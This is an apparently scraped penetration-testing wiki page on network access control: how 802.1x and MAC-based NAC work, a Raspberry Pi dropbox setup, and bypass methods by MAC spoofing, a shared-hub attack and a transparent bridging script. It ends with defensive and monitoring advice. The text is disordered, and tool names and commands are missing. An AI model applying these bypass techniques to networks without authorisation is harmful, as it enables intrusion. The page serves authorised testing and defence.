Network Access Control
Bypassing Network Access Control Systems
Last updated
Was this helpful?
Bypassing Network Access Control Systems
Last updated
Was this helpful?
(Network Access Control) acts as a kind of a gatekeeper to the local network infrastructure. Its usually works with whitelists, blacklists, authentication requirements or host scanning to restrict access and keep unwanted devices out of the network.
NAC is a principle. It can be setup with several measures.
Filtering of MAC addresses
Authentication with username & password
Authentication with certificates
Fingerprinting
Host checks
NAC aims at protecting against the including, but not limited to, scenarios.
Employees bringing rogue devices (willingly or not)
Service providers acting inside the IT / OT network*
Attackers trying to gain access to the internal network
*IT/OT network: Information Technology (workstations, users, shares, ...) and (machines, productionl lines, ...).
The supplicant: the client that is asking for network access
The authenticator: the device that acts as the gatekeeper and to which the clients connects - most likely a switch.
The authentication server: something in the background that validates the requests and grants or denies access to the supplicant.
These EAPOL frames are forwarded from "the client desiring access to the network" to "the switch".
The switch unpacks the EAPOL and forwards the EAP packet to an authentication server, which in most cases will be a RADIUS server.
From there everything goes vice versa. As EAP is more a framework than a protocol, it contains several EAP methods for authentication. The most commonly known variants are EAP-TLS, EAP-MD5, EAP-PSK and EAP-IKEv2, allowing to authenticate by preshared keys, passwords, certificates or other mechanisms.
When all checks are passed, the port will be switched to authorized and thus be allowed for normal network traffic.
A device, known as "dropbox", is needed to carry out according attacks when conducting NAC penetration tests. The following setup is a commonly used for this type of engagements.
Raspberry Pi 4 8GB
SD card
3.5” TFT with Case
Additional USB Ethernet Adapter Power Adapter
Keyboard
(optional) Powerbank
(optional) LTE USB modem
The integrated wireless interface can be used to spawn a hotspot to be able to connect via SSH.
The following commands can then be run to install the necessary libraries and tools.
The DHCP configuration file is located at /etc/dhcp/dhcpd.conf and can be edited to determine how the dropbox will act as a DHCP server.
The host access point daemon (hostapd) configuration file is located at /etc/hostapd/hostapd.conf and can be edited to determine how the dropbox will act as a wireless access point.
There are several scenarios to take into consideration with specific bypass possibilities.
Companies usually have devices that don't fully support 802.1x. Among them can be printers, VOIP equipment, cameras, etc. These will usually be granted access to the network only by having their MAC address in a whitelist. This is often dubbed "MAC-based NAC".
MAC-based and 802.1x are usually managed one of many ways:
by having the authenticator (i.e. port) check if the devices than connect support 802.1x and switch to MAC-based if they don't
In this case, access to the network is granted if the supplicant's MAC address is whitelisted and if the authentication then succeeds.
Use a Hub, switch the MAC address to the victim's one, connect the drop box and the victim to the same ethernet port. The “real” device will do the auth stuff, putting the port into authorized mode, and allow both devices to connect to the network. As both have the same MAC, the switch will only have one entry in its ARP / SAT table, not raising suspicion.
This idea involves a device that - simply spoken - in a first instance just lets all the traffic traverse it by means of forwarding rules, being totally transparent to the network and all the participants. Tt then does some tcpdump magic to sniff traffic like ARP, NetBIOS but also Kerberos, Active Directory, web etc., extracting the needed info to spoof the victim and the networks gateway to stay under the radar. With this info the needed rules in ebtables, iptables etc. are automatically created, and will allow an attacker to interact with the network mimicking the victim.
The steps are as follows:
find a target deivce and put the dropbox in between
start the nac_bypass_setup.sh script
Wait until the script gathered the MAC address of the attacked system, the IP of the attacked system and the gateway's MAC address in order to perform the attack. If all went well the following info will show up and the device should be able to talk to the network:
In general an 802.1x implementation will prevent employees or service providers from connecting rogue devices to the network. To a certain extend it may also block script kiddies that don't have the l33t skillz to bypass it. For more advanced adversaries, the attacks will most likely be successful.
Here are some general guidelines for keeping things as secure as possible:
Separate devices that authenticate by MAC only
Reduce the time for re-authentication to minimize the hub attack scenario. Leaving ports open after a successful 802.1x authentication for an hour will pose a much higher risk than 5 minutes.
Use MACSec if possible. This will at least make it much harder for an attacker to gather the needed info to play for Man in the Middle.
Monitoring:
Uncommon link up/downs on switches
Speed / duplex changes
Changes in framesizes (e.g. Windows vs Linux)
Changed TTLs
Access to systems and services that normally don´t get accessed (firewall logs)
Monitor network traffic and detect attacks / unknown patterns (IDS/IPS/SIEM)
Unneeded ports must be disabled/disconnected.
Don't expose unneeded info. Stickers with IP/MAC addresses will make it much easier for an attacker. Same goes for access to IP phone or printer menus to gather network intel. Restrict them as much as possible.
Restrict access to the systems. If someone is not able to get in between, he can't carry out attacks.
Awareness: train employees to ask questions and inform people, when they see a suspicious device hanging from a printer or stuff like that.
Most commonly, NAC solution are based on which is a standard for port based network access. It will interact with the switches (most likely and mainly via SNMP) and allow or block ports based on the preset rules. There are 3 actors involved:
By default, the ports are in an unauthorized state and will only be allowed to transmit and receive frames (Extensible Authentication Protocol Over LAN), which basically is encapsulated .
An infrastructure that is capable of talking 802.1x is needed for all this to work properly. The infrastructure is comprised of supplicants (i.e. clients), authenticators (i.e. switches) and authentication servers (i.e. servers).
A short overview from Gartner lists and reviews many NAC solutions: .
The Raspberry can be flushed with .
by setting up each physical RJ45 port (i.e. the authenticator) in the building to do either MAC-based NAC or 802.1x ->
by mixing MAC-based and authentication (i.e. 802.1x): the MAC address is checked and authentication then takes place ->
Devices like the , , or can be helpful in NAC-bypass engagements. Nota bene: keep in mind ghosted Linux machines will require custom iptable rules to work smoothly.
can be done by spoofing an authorized MAC address.
The first step in spoofing an authorized MAC address is to find one. This can be done by physically searching addresses on printers, labels, IP phones and similar equipment, or by using to manually inspect broadcast and multicast packets that travel on the network and obtain some MAC addresses in the traffic.c.
can then be used to spoof the a MAC address. Once there, cables can be swapped to access the customer's network.
Same thing as , without the MAC-based verification bypass.
A regular authentication to 802.1x (and others) systems can be conducted with (C).
Just like with bypass, the first step is to find an authorized MAC address.
The second step is to access the port without authentication, which leaves at least two possible ways, both relying on .
There is an awesome tool called from which he walks through in blog post.
run other offensive tools for , , etc.
